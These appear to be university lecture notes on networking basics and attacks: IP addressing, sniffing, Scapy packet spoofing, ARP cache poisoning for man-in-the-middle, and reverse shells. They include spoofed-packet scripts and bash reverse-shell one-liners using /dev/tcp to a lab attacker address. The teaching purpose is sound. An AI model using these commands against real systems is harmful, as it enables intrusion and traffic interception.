Lecture 9

Networking Basics and Attacks

Overview

  • This lecture covers networking basics, sniffing and spoofing techniques, ARP poisoning, the Heartbleed vulnerability, and reverse shells. The next lecture will cover firewalls, DNS attacks, and TCP/UDP attacks.

Outline

  • IP Address and Network Interface
  • TCP/IP Protocols
  • Packet Sniffing
  • Packet Spoofing
  • ARP Protocol and Attacks
  • Reverse Shells

IP Address

IP Address: The Original Scheme

  • Different classes of IP addresses:
    • Class A: From 0.0.0.0 to 127.255.255.255. First bit is 0.
    • Class B: From 128.0.0.0 to 191.255.255.255. First two bits are 10.
    • Class C: From 192.0.0.0 to 223.255.255.255. First three bits are 110.
    • Class D: From 224.0.0.0 to 239.255.255.255. First four bits are 1110. Used for multicast.
    • Class E: From 240.0.0.0 to 255.255.255.255. First four bits are 1111. Reserved for future use.

CIDR Scheme (Classless Inter-Domain Routing)

  • CIDR notation: 192.168.60.5/24 indicates that the first 24 bits are the network ID.
  • Question: What is the address range of the network 192.168.192.0/19?

Special IP Addresses

  • Private IP Addresses:
    • 10.0.0.0/8
    • 172.16.0.0/12
    • 192.168.0.0/16
  • Loopback Address:
    • 127.0.0.0/8
    • Commonly used: 127.0.0.1

List IP Address on Network Interface

  • Command: $ ip -br address
  • Example output:
    lo UNKNOWN 127.0.0.1/8 ::1/128 enp0s3 UP 10.0.5.5/24 fe80::bed8:53e2:5192:f265/64 docker0 DOWN 172.17.0.1/16 fe80::42:13ff:fee7:90d6/64

Manually Assign IP Address

  • Commands:
    • $ sudo ip addr add 192.168.60.6/24 dev enp0s3
    • $ ip addr

Automatically Assign IP Address

  • DHCP: Dynamic Host Configuration Protocol

Get IP Addresses for Host Names: DNS

  • Command: $ dig www.example.com
  • The dig command queries DNS servers to obtain domain name information, such as IP addresses.

Network Stack

Packet Journey at a High Level

  • A packet travels from source A to destination B through multiple routers and networks.

How Packets Are Constructed

  • Application Layer: Data
  • Transport Layer: Adds TCP or UDP header.
  • Network Layer: Adds IP header.
  • MAC Layer: Adds MAC header. NIC then transmits the data over the network

Layer 4: Transport Layer

  • Includes source port and destination port.
  • TCP or UDP header.

Layer 3: Network Layer

  • Constructs packet with source IP and destination IP addresses, then routes it.

Layer 2: Data Link Layer (MAC Layer)

  • Adds destination MAC address and source MAC address.

Sending Packet in Python (UDP Client)

  • Code:
    python #!/usr/bin/python3 import socket IP = "127.0.0.1" PORT = 9090 data = b'Hello, World!' sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(data, (IP, PORT))
  • Execution Results:
    $ nc -luv 9090 Listening on [0.0.0.0] (family 0, port 9090) Hello, World!

Receiving Packets in Python (UDP Server)

  • Code:
    python #!/usr/bin/python3 import socket IP = "0.0.0.0" PORT = 9090 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((IP, PORT)) while True: data, (ip, port) = sock.recvfrom(1024) print("Sender: {} and Port: {}".format(ip, port)) print("Received message: {}".format(data))
  • Example:
    • Terminal 1 sends "hello" and "hello again" to the server.
    • Terminal 2 (server) receives and prints the messages along with the sender's IP and port.

How Packets Are Received

  • Reverse process of sending; involves the NIC, MAC Layer, Network Layer (routing), Transport Layer (port), and finally the Application.

Routing

  • Routing Table

The ip route Command

  • Examples:
    • # ip route
    • # ip route get 10.9.0.1
    • # ip route get 192.168.60.5
    • # ip route get 1.2.3.4

Packet Sending Tools

  • Using netcat:
    • $ nc <ip> <port> (TCP packet)
    • $ nc -u <ip> <port> (UDP packet)
    • $ echo "data" > /dev/udp/<ip>/<port>
    • $ echo "data" > /dev/tcp/<ip>/<port>
  • Others: telnet, ping, etc.

Packet Sniffing

How Packets Are Received for Sniffing

  • Link-level driver copies packets to a ring buffer. Protocol stack and user space access the packets from there, enabling the capture of network traffic.

Packet Sniffing Tools

  • Tcpdump: Command-line tool, suitable for containers.
  • Wireshark: GUI tool, suitable for environments supporting a GUI.

Packet Spoofing

Overview

  • Normal packet construction: OS sets most header fields, users control a few.
  • Packet spoofing: Allows setting arbitrary header fields.

How To Spoof Packets

  • Manipulate packet headers at different layers (Application, Transport, Network, MAC) using tools like Scapy.

Spoofing ICMP Packets

  • Python code using Scapy:
    python #!/usr/bin/python3 from scapy.all import * print("SENDING SPOOFED ICMP PACKET . . . . . . . . . \n") ip = IP(src="1.2.3.4", dst="93.184.216.34") icmp = ICMP() pkt = ip/icmp pkt.show() send(pkt, verbose=0)

Spoofing UDP Packets

  • Python code using Scapy:
    python #!/usr/bin/python3 from scapy.all import * print("SENDING SPOOFED UDP PACKET . . . . . . . . . ") ip = IP(src="1.2.3.4", dst="10.0.2.69") # IP Layer udp = UDP(sport=8888, dport=9090) # UDP Layer data = "Hello UDP!\n" # Payload pkt = ip/udp/data pkt.show() send(pkt, verbose=0)

Other Uses of Scapy: Send and Receive

  • send(): Send packets at Layer 3.
  • sendp(): Send packets at Layer 2.
  • sr(): Sends packets at Layer 3 and receiving answers.
  • srp(): Sends packets at Layer 2 and receiving answers.
  • srl(): Sends packets at Layer 3 and waits for the first answer.
  • srlp(): Sends packets at Layer 2 and waits for the first answer.
  • srloop(): Send a packet at Layer 3 in a loop and print the answer each time.
  • srploop(): Send a packet at Layer 2 in a loop and print the answer each time.

ARP Protocol and Attacks

Outline

  • Network Interface
  • Ethernet frame and MAC header
  • ARP protocol
  • ARP cache poisoning attack.

Network Interface Card (NIC)

  • Physical or logical link between computer and network.
  • Each NIC has a MAC address.

Network Interface and Ethernet

  • Packet Flow: Link-level driver, ring buffer, protocol stack

Physical and Virtual NIC

  • Physical interface
  • Loopback/dummy interface
  • tun/tap interface

Examples of Virtual NIC

  • Loopback Interface
    • $ ifconfig lo
  • Dummy Interface (similar to loopback, but with its own IP)
    • $ ip link add dummy1 type dummy
    • $ ip addr add 1.2.3.4/24 dev dummy1
    • $ ip link set dummy1 up
    • $ ifconfig

Ethernet Frame & MAC Header

  • Destination MAC Address, Source MAC Address, Ether Type, Payload, Checksum
  • MAC Header or Ethernet Header: 14 bytes

Ethernet Frame Example

  • Details of an Ethernet frame, including source and destination MAC addresses, IP addresses, and protocol information.

Promiscuous Mode

  • Normal mode: NIC checks destination MAC address; accepts if it's its own, discards otherwise.
  • Promiscuous mode: NIC accepts all packets on the local network, regardless of destination MAC address. Useful for packet sniffing.

MAC Address Randomization and Privacy

  • iOS 8 introduced MAC address randomization to hide devices' true identities when searching for Wi-Fi networks.

The ARP Protocol

  • Communication on LAN requires MAC addresses, but often only IP address is known.
  • ARP: Address Resolution Protocol - finds MAC from IP.

ARP Request/Reply

  • ARP Request (broadcast): "who-has 10.9.0.7? tell 10.9.0.5"
  • ARP Reply: "10.9.0.7 is at 02:42:0a:09:00:07"

Send ARP Request: Example 1

  • Using ping and tcpdump to observe ARP requests and replies.

Send ARP Request: Example 2

  • Using ping and Wireshark to analyze ARP traffic.

ARP Message Format

  • Hardware Type, Protocol Type, MAC address length, IP address length, Sender MAC Address, Sender IP Address, Target MAC Address, Target IP Address.

Questions

  • Different behaviors of the following commands:
    1. ping 10.9.0.6 (existing, on LAN)
    2. ping 10.9.0.99 (non-existing, on LAN)
    3. ping 1.2.3.4 (non-existing, not on LAN)
    4. ping 8.8.8.8 (existing, on the Internet)

ARP Cache

  • Avoid sending too many ARP requests: ARP caches received information.
  • Commands: arp -n

ARP Cache Poisoning Attack

  • Goal: Corrupt the ARP cache of a host to redirect traffic.

ARP Cache Poisoning

  • Spoof ARP Messages (Request, Reply, Gratuitous message).
  • Spoofed message gets cached by the victim.

Spoofing Gratuitous Message

  • Special type of ARP message.
  • Source IP = Destination IP.
  • Destination MAC = broadcast address (ff:ff:ff:ff:ff:ff).

Note: ARP Becomes "Stateful"

  • Example showing incomplete ARP entries.

Man-In-The-Middle Attack

  • Attacker intercepts and potentially alters communication between two parties.

Use ARP Cache Poisoning to Redirect Packets

  • Poison A’s ARP cache, so B’s IP is mapped to M’s MAC.
  • Poison B’s ARP cache, so A’s IP is mapped to M’s MAC

Implication

  • Attacker machine can now receive packets sent from A to B and B to A.
  • Using sniffing and spoofing tools, attackers can perform numerous attacks.

Reverse Shell (Recall)

Overview

  • File descriptor
  • Standard input and output devices
  • Redirecting standard input and output
  • How reverse shell works

The Idea of Reverse Shell

  • Attacker gains shell access on the victim's machine by redirecting input/output streams.

File Descriptor

  • Example C code demonstrating file descriptor usage.

File Descriptor Table

  • Mapping of file descriptors to open files.

Standard I/O Devices

  • Standard input (0), standard output (1), standard error (2).

Redirection

  • Examples of redirecting input and output to files and file descriptors.

How Is Redirection Implemented?

  • Creates a copy of the file descriptor oldfp, and then assign newfd as the new file descriptor.

Redirecting Output to TCP Connections

  • C code example.

Redirecting Input to TCP Connections

  • C code example.

Redirecting to TCP from Shell

  • Redirecting Input and Output
  • Running a TCP server on 10.0.2.5: $ nc –l 9090

Note

  • /dev/tcp is not a real folder; it is a bash-specific virtual file/folder.
  • Redirection to /dev/tcp can only be done inside bash.

Reverse Shell Overview

  • Attacker machine listens for a connection, and the victim machine connects back, providing a shell.

Redirecting Standard Output

  • On Attacker Machine (10.0.2.70): $ nc -lv 9090
  • On Server Machine: Server:$ /bin/bash -i > /dev/tcp/10.0.2.70/9090

Redirecting Standard Input & Output

  • On Server Machine: Server:$ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1

Redirecting Standard Error, Input, & Output

  • On Server Machine: $ /bin/bash -i > /dev/tcp/10.0.2.70/9090 0<&1 2>&1

Reverse Shell via Code Injection

  • Reverse shell is executed via injected code.
  • Can’t assume that the target machine runs bash.
  • Run bash first.

Summary

  • Reverse shell works by redirecting shell program’s input/output.
  • Input and output of a program can be redirected to a TCP connection.
  • The other end of the TCP connection is the attacker.
  • It is a widely used technique by attackers.